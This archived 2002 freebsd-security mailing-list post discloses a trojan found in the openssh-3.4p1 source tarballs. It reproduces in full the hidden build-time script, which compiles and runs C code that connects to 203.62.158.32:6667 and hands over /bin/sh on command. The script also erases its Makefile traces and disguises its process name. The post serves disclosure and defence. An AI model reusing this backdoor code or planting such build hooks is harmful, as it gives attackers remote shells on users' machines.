From owner-freebsd-security Thu Aug 1 5:12:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6761737B400 for ; Thu, 1 Aug 2002 05:12:22 -0700 (PDT) Received: from mail.comitnet.com (skiffer.comitnet.com [212.181.63.123]) by mx1.FreeBSD.org (Postfix) with SMTP id D128A43E4A for ; Thu, 1 Aug 2002 05:12:20 -0700 (PDT) (envelope-from bond@comitnet.se) Received: (qmail 18969 invoked from network); 1 Aug 2002 12:12:21 -0000 Received: from unknown (HELO ?192.168.57.109?) (212.181.63.111) by 212.181.63.98 with SMTP; 1 Aug 2002 12:12:21 -0000 Mime-Version: 1.0 X-Sender: bond%comitnet.se@pop3.comitnet.com Message-Id: Date: Thu, 1 Aug 2002 14:11:24 +0200 To: freebsd-security@FreeBSD.ORG From: Artur Lindgren Subject: Trojan located in latest openssh tar files Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Greetings, I noticed that openssh-3.4p has a trojan horse (available from ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz and some of the mirrors. (ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/ ) After compiling the file bf-test.c you will notice that it does following: # testing in raw ecb mode #!/bin/sh cat >conftest.c <<_ACEOF #include #include #include #include #include #include #include #include jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig (int sig){close(s);sleep(3600);longjmp(env,0); }int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2); memset(&act,0,sizeof(act));act.sa_handler=sig; sigaction(SIGALRM,&act,NULL);do{setjmp(env); if((s=socket(AF_INET,SOCK_STREAM,0))==(1))exit(1); memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET; sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr ("203.62.158.32");alarm(10);if(connect(s, (struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1) ;if((x=read(s,&c,1))==(-1)){exit(1);} else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2) ;a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break; case 'M':alarm(0);sig(0);break;default:}}else{exit (0);}}while(1);} _ACEOF (grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out rm -f bf-test* TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`" if ! test $TESTPROG ; then TESTPROG=sh; fi gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1 It runs once, upon compilation of openssh, and is named sh or the compiling users default shell in the processlist in the process listing. This trojan attempts to connect to 203.62.158.32:6667 (hacked machine which has been secured now), and awaits one of three characters as the command; D execs /bin/sh M respawns A kills the deamon The /bin/sh executed via the D command was controlled by the daemon listening on 203.62.158.32:6667, potentially meaning that people affected by this has given a shell, possibly root, to user unknown. "Let this be a lesson. Don't use root unless you REALLY have to." Regards, Artur Lindgren, Comitnet AB Special thanks to (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP people in sweden :D) Thanks to ^Sarge^ for quickly taking care of the hacked machine this trojan connected to. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message